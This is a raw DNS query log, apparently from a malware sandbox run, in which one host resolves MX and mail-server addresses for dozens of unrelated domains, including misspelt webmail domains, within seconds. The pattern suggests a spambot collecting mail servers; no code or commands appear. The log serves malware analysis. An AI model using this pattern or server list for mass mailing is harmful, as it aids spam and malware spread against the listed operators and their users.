Feb 21, 2024 00:26:03.242043972 CET	1.1.1.1	192.168.2.6	0x665e	No error (0)	shinko-kensetsu.co.jp			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.242819071 CET	1.1.1.1	192.168.2.6	0xb500	Name error (3)	hoenighotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.247493982 CET	1.1.1.1	192.168.2.6	0xf0de	No error (0)	aspmx3.googlemail.com		64.233.184.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.247837067 CET	1.1.1.1	192.168.2.6	0x3a0a	Name error (3)	homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.248425007 CET	1.1.1.1	192.168.2.6	0x4895	No error (0)	smtp.google.com		172.253.63.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.248425007 CET	1.1.1.1	192.168.2.6	0x4895	No error (0)	smtp.google.com		142.250.31.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.248425007 CET	1.1.1.1	192.168.2.6	0x4895	No error (0)	smtp.google.com		142.250.31.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.248425007 CET	1.1.1.1	192.168.2.6	0x4895	No error (0)	smtp.google.com		172.253.63.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.248425007 CET	1.1.1.1	192.168.2.6	0x4895	No error (0)	smtp.google.com		172.253.122.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.248498917 CET	1.1.1.1	192.168.2.6	0x23b8	Name error (3)	ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.250176907 CET	1.1.1.1	192.168.2.6	0x6fb	Name error (3)	oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.250579119 CET	1.1.1.1	192.168.2.6	0xafe3	No error (0)	mhcosta.gotadsl.co.uk		213.208.126.141	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.251349926 CET	1.1.1.1	192.168.2.6	0x95f4	No error (0)	waukesha-water.com		208.109.43.169	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.252644062 CET	1.1.1.1	192.168.2.6	0xed97	No error (0)	touktoukcie.com		185.230.63.186	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.252644062 CET	1.1.1.1	192.168.2.6	0xed97	No error (0)	touktoukcie.com		185.230.63.171	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.252644062 CET	1.1.1.1	192.168.2.6	0xed97	No error (0)	touktoukcie.com		185.230.63.107	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.252953053 CET	1.1.1.1	192.168.2.6	0x62ab	No error (0)	smtpin.rzone.de		81.169.145.97	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.254889965 CET	1.1.1.1	192.168.2.6	0xb336	No error (0)	markoren.no		185.39.146.199	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.261964083 CET	1.1.1.1	192.168.2.6	0xb15d	No error (0)	caspiantravel.co.uk		217.160.0.208	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.264058113 CET	1.1.1.1	192.168.2.6	0xd9a0	No error (0)	acidvision.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.264058113 CET	1.1.1.1	192.168.2.6	0xd9a0	No error (0)	acidvision.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.266315937 CET	1.1.1.1	192.168.2.6	0x650b	No error (0)	blauthlaw.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.266315937 CET	1.1.1.1	192.168.2.6	0x650b	No error (0)	blauthlaw.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.268568993 CET	1.1.1.1	192.168.2.6	0x9791	No error (0)	upblue.de		217.160.0.179	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.271827936 CET	1.1.1.1	192.168.2.6	0x24df	Name error (3)	gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.274389982 CET	1.1.1.1	192.168.2.6	0xf697	No error (0)	mlbx.matrix.jp		59.106.13.100	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.292821884 CET	1.1.1.1	192.168.2.6	0x1bcf	No error (0)	wilsonfamilyinsurance.com		162.241.216.197	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.294312954 CET	1.1.1.1	192.168.2.6	0x7bb0	No error (0)	wild-east.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.298072100 CET	1.1.1.1	192.168.2.6	0xdcfa	No error (0)	veselcontractors.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.298072100 CET	1.1.1.1	192.168.2.6	0xdcfa	No error (0)	veselcontractors.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.302094936 CET	1.1.1.1	192.168.2.6	0xe2b4	No error (0)	collevilca.it		86.107.32.28	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.302890062 CET	1.1.1.1	192.168.2.6	0xb8f1	No error (0)	wefttechnologies.com		162.215.240.240	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.306750059 CET	1.1.1.1	192.168.2.6	0xd4f3	No error (0)	art-paix-di.org		213.186.33.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.19	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.15	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.11	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.321568966 CET	1.1.1.1	192.168.2.6	0xc7dd	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.8	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.15	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.28	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.327362061 CET	1.1.1.1	192.168.2.6	0x1666	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.334693909 CET	1.1.1.1	192.168.2.6	0x89	No error (0)	eskimo.ch		217.26.61.200	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.335413933 CET	1.1.1.1	192.168.2.6	0x8cb1	No error (0)	cabinet-orsika.fr		51.159.190.167	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.335897923 CET	1.1.1.1	192.168.2.6	0x3626	No error (0)	creativ-moebelwerkstaetten.de		81.169.145.86	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.344752073 CET	1.1.1.1	192.168.2.6	0x5729	No error (0)	network-abilities.com		217.70.184.38	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.344805002 CET	1.1.1.1	192.168.2.6	0xf089	No error (0)	popular.de		85.13.138.112	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.354191065 CET	1.1.1.1	192.168.2.6	0x442b	No error (0)	hotmail.fr.au		103.224.182.253	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.358835936 CET	1.1.1.1	192.168.2.6	0xdd10	No error (0)	imailzone.com		72.52.178.23	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.366986036 CET	1.1.1.1	192.168.2.6	0xf563	Name error (3)	esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.370517015 CET	1.1.1.1	192.168.2.6	0x36a8	No error (0)	derbyron.de		91.136.8.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.371202946 CET	1.1.1.1	192.168.2.6	0xb83e	No error (0)	mail.touktoukcie.com		185.177.47.38	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.373234987 CET	1.1.1.1	192.168.2.6	0x22b7	No error (0)	wild-east.de		62.156.168.56	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.378592968 CET	1.1.1.1	192.168.2.6	0x3604	No error (0)	cpsgroupe.com		109.71.40.107	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.383172035 CET	1.1.1.1	192.168.2.6	0xd69f	No error (0)	b4l-clan.de		127.0.0.1	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.383445024 CET	1.1.1.1	192.168.2.6	0xfcb9	Name error (3)	hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.389259100 CET	1.1.1.1	192.168.2.6	0xc9fd	No error (0)	pharmacie-vp.fr		213.186.33.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.398154974 CET	1.1.1.1	192.168.2.6	0x9019	Name error (3)	runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.399430037 CET	1.1.1.1	192.168.2.6	0xb1ee	No error (0)	iisalessandrini.it		15.161.71.77	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.407205105 CET	1.1.1.1	192.168.2.6	0xbfa5	No error (0)	publichouse.ie		198.185.159.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.407205105 CET	1.1.1.1	192.168.2.6	0xbfa5	No error (0)	publichouse.ie		198.49.23.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.407205105 CET	1.1.1.1	192.168.2.6	0xbfa5	No error (0)	publichouse.ie		198.49.23.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.407205105 CET	1.1.1.1	192.168.2.6	0xbfa5	No error (0)	publichouse.ie		198.185.159.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.412265062 CET	1.1.1.1	192.168.2.6	0xdd79	No error (0)	protonmail.de		3.33.139.32	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.416766882 CET	1.1.1.1	192.168.2.6	0x9112	No error (0)	schussundtor.de		91.195.240.135	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.420725107 CET	1.1.1.1	192.168.2.6	0x26b8	No error (0)	voltage-distribution.com		62.210.211.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.424097061 CET	1.1.1.1	192.168.2.6	0xf399	Name error (3)	hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.429639101 CET	1.1.1.1	192.168.2.6	0x956b	No error (0)	stylesense.co.uk		86.105.245.69	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.438095093 CET	1.1.1.1	192.168.2.6	0x7cb7	No error (0)	mail.wilsonfamilyinsurance.com		162.241.216.197	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.441703081 CET	1.1.1.1	192.168.2.6	0x3593	No error (0)	ksv-schwimmen.de		81.169.145.86	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.456058979 CET	1.1.1.1	192.168.2.6	0xc72b	No error (0)	m-viper.de		144.91.85.110	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.456546068 CET	1.1.1.1	192.168.2.6	0xfb10	No error (0)	sportclinic.co.il		185.230.63.107	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.456546068 CET	1.1.1.1	192.168.2.6	0xfb10	No error (0)	sportclinic.co.il		185.230.63.171	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.456546068 CET	1.1.1.1	192.168.2.6	0xfb10	No error (0)	sportclinic.co.il		185.230.63.186	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.488163948 CET	1.1.1.1	192.168.2.6	0xdc05	No error (0)	att.com.tw		104.21.66.152	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.488163948 CET	1.1.1.1	192.168.2.6	0xdc05	No error (0)	att.com.tw		172.67.161.124	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.522938967 CET	1.1.1.1	192.168.2.6	0x50f5	No error (0)	att.com.ph		185.107.56.198	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.569344997 CET	1.1.1.1	192.168.2.6	0x1db3	No error (0)	braekling.de		85.214.145.11	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.616441011 CET	1.1.1.1	192.168.2.6	0x1fe4	No error (0)	mx.alice-dsl.net		91.136.8.194	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.621692896 CET	1.1.1.1	192.168.2.6	0x7490	Name error (3)	outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.733407021 CET	1.1.1.1	192.168.2.6	0x3c94	No error (0)	cfca.eu		178.33.253.225	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.816575050 CET	1.1.1.1	192.168.2.6	0xeb41	No error (0)	archononline.com		45.136.114.149	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.823735952 CET	1.1.1.1	192.168.2.6	0xc2e5	Name error (3)	hoenighotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.838156939 CET	1.1.1.1	192.168.2.6	0x1372	No error (0)	norwegischlernen.info			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.838156939 CET	1.1.1.1	192.168.2.6	0x1372	No error (0)	norwegischlernen.info			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.838156939 CET	1.1.1.1	192.168.2.6	0x1372	No error (0)	norwegischlernen.info			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.869066000 CET	1.1.1.1	192.168.2.6	0xba54	No error (0)	shinko-kensetsu.co.jp		223.29.45.22	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.879966974 CET	1.1.1.1	192.168.2.6	0x3c69	No error (0)	strategicimpact.com.au		13.248.243.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.952202082 CET	1.1.1.1	192.168.2.6	0x35ea	No error (0)	upblue.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.952202082 CET	1.1.1.1	192.168.2.6	0x35ea	No error (0)	upblue.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271132946 CET	1.1.1.1	192.168.2.6	0xa31f	No error (0)	archononline.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271132946 CET	1.1.1.1	192.168.2.6	0xa31f	No error (0)	archononline.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271132946 CET	1.1.1.1	192.168.2.6	0xa31f	No error (0)	archononline.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271132946 CET	1.1.1.1	192.168.2.6	0xa31f	No error (0)	archononline.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271132946 CET	1.1.1.1	192.168.2.6	0xa31f	No error (0)	archononline.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.292165041 CET	1.1.1.1	192.168.2.6	0xf498	No error (0)	breecetechnology.co.za		78.47.2.70	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.318279982 CET	1.1.1.1	192.168.2.6	0x2b19	No error (0)	att.com.hk		218.213.216.154	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.332103968 CET	1.1.1.1	192.168.2.6	0x2b19	No error (0)	att.com.hk		218.213.216.154	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.332885981 CET	1.1.1.1	192.168.2.6	0xf498	No error (0)	breecetechnology.co.za		78.47.2.70	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.340559006 CET	1.1.1.1	192.168.2.6	0x8f7	Name error (3)	ufer-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.346946001 CET	1.1.1.1	192.168.2.6	0xb245	No error (0)	mx01.ionos.co.uk		217.72.192.67	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.347233057 CET	1.1.1.1	192.168.2.6	0x962d	No error (0)	mx3.mtaroutes.com		38.111.198.185	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.347248077 CET	1.1.1.1	192.168.2.6	0x902d	No error (0)	ASPMX.L.GOOGLE.com		142.250.31.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.347399950 CET	1.1.1.1	192.168.2.6	0x84d6	No error (0)	aspmx.l.google.com		172.253.63.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.347776890 CET	1.1.1.1	192.168.2.6	0x5d61	No error (0)	spool.mail.gandi.net		217.70.178.1	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.351600885 CET	1.1.1.1	192.168.2.6	0x3385	No error (0)	aspmx2.googlemail.com		209.85.202.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.359507084 CET	1.1.1.1	192.168.2.6	0x9c	No error (0)	mx01.mail-redirect.de		88.99.82.73	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.359755039 CET	1.1.1.1	192.168.2.6	0xff9	No error (0)	mxb.ovh.net		46.105.45.21	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.360083103 CET	1.1.1.1	192.168.2.6	0x1c1c	No error (0)	alt4.aspmx.l.google.com		142.250.153.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.362608910 CET	1.1.1.1	192.168.2.6	0x7799	No error (0)	a.mx.nildram.net		85.119.249.224	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.362608910 CET	1.1.1.1	192.168.2.6	0x7799	No error (0)	a.mx.nildram.net		85.119.249.226	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.362608910 CET	1.1.1.1	192.168.2.6	0x7799	No error (0)	a.mx.nildram.net		85.119.249.225	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.362608910 CET	1.1.1.1	192.168.2.6	0x7799	No error (0)	a.mx.nildram.net		85.119.249.227	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.362763882 CET	1.1.1.1	192.168.2.6	0xad6d	No error (0)	mx1.forwardemail.net		138.197.213.185	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.364542961 CET	1.1.1.1	192.168.2.6	0x8e42	No error (0)	mx.generic-isp.com		142.93.237.125	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.366504908 CET	1.1.1.1	192.168.2.6	0xcd4d	No error (0)	montessorihawaii.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.366504908 CET	1.1.1.1	192.168.2.6	0xcd4d	No error (0)	montessorihawaii.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.366504908 CET	1.1.1.1	192.168.2.6	0xcd4d	No error (0)	montessorihawaii.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.366504908 CET	1.1.1.1	192.168.2.6	0xcd4d	No error (0)	montessorihawaii.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.366504908 CET	1.1.1.1	192.168.2.6	0xcd4d	No error (0)	montessorihawaii.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.413804054 CET	1.1.1.1	192.168.2.6	0xb5c9	Name error (3)	oulohotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.25	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.8	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.73.24	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.425872087 CET	1.1.1.1	192.168.2.6	0xb8ef	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.429507017 CET	1.1.1.1	192.168.2.6	0x5787	No error (0)	park-mx.above.com		103.224.212.34	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		130.185.80.210	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		130.185.80.200	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		109.71.47.60	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		109.71.47.160	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		109.71.47.152	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		130.185.80.60	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		94.46.16.235	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.432255030 CET	1.1.1.1	192.168.2.6	0x8545	No error (0)	mx1.cleanmx.pt		130.185.80.110	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.436014891 CET	1.1.1.1	192.168.2.6	0x7759	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.436014891 CET	1.1.1.1	192.168.2.6	0x7759	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.436285019 CET	1.1.1.1	192.168.2.6	0x314e	No error (0)	voltagedistribution-com01i.mail.protection.outlook.com		104.47.24.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.436285019 CET	1.1.1.1	192.168.2.6	0x314e	No error (0)	voltagedistribution-com01i.mail.protection.outlook.com		104.47.25.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.479384899 CET	1.1.1.1	192.168.2.6	0xa39a	No error (0)	cfgteam.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.498604059 CET	1.1.1.1	192.168.2.6	0xcccd	No error (0)	cabinet-orsika.fr			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.498604059 CET	1.1.1.1	192.168.2.6	0xcccd	No error (0)	cabinet-orsika.fr			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.498604059 CET	1.1.1.1	192.168.2.6	0xcccd	No error (0)	cabinet-orsika.fr			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.598814011 CET	1.1.1.1	192.168.2.6	0xe326	No error (0)	eskimo.ch			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.598814011 CET	1.1.1.1	192.168.2.6	0xe326	No error (0)	eskimo.ch			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.640305996 CET	1.1.1.1	192.168.2.6	0x9668	No error (0)	houseguru.com.au		221.121.158.21	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.640328884 CET	1.1.1.1	192.168.2.6	0x9668	No error (0)	houseguru.com.au		221.121.158.21	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.687222004 CET	1.1.1.1	192.168.2.6	0xca5d	No error (0)	alt2.aspmx.l.google.com		64.233.184.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.688611031 CET	1.1.1.1	192.168.2.6	0x2a9	No error (0)	mx.mail-data.net		143.244.202.96	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.690449953 CET	1.1.1.1	192.168.2.6	0x845a	No error (0)	mx01.ionos.de		217.72.192.67	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.752513885 CET	1.1.1.1	192.168.2.6	0x8b37	No error (0)	mail.att.com.tw		122.146.164.33	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.760009050 CET	1.1.1.1	192.168.2.6	0x1e8f	No error (0)	architettosangiorgio-ch.mail.protection.outlook.com		104.47.22.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.760009050 CET	1.1.1.1	192.168.2.6	0x1e8f	No error (0)	architettosangiorgio-ch.mail.protection.outlook.com		104.47.22.74	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.761399984 CET	1.1.1.1	192.168.2.6	0x785a	No error (0)	pharmacievp-fr02c.mail.protection.outlook.com		104.47.24.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.761399984 CET	1.1.1.1	192.168.2.6	0x785a	No error (0)	pharmacievp-fr02c.mail.protection.outlook.com		104.47.25.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.843987942 CET	1.1.1.1	192.168.2.6	0x8c2c	No error (0)	mail.b4l-clan.de		127.0.0.1	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.858277082 CET	1.1.1.1	192.168.2.6	0xf26b	No error (0)	angusma.vps360.net		218.213.216.154	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.877391100 CET	1.1.1.1	192.168.2.6	0x52ca	Server failure (2)	att.co.id	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.877438068 CET	1.1.1.1	192.168.2.6	0x52ca	Server failure (2)	att.co.id	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.877444029 CET	1.1.1.1	192.168.2.6	0x52ca	Server failure (2)	att.co.id	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.908226013 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	mx.netregistry.net		202.124.241.196	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:05.164854050 CET	1.1.1.1	192.168.2.6	0xf829	No error (0)	mail.shinko-kensetsu.co.jp		223.29.45.22	A (IP address)	IN (0x0001)	false
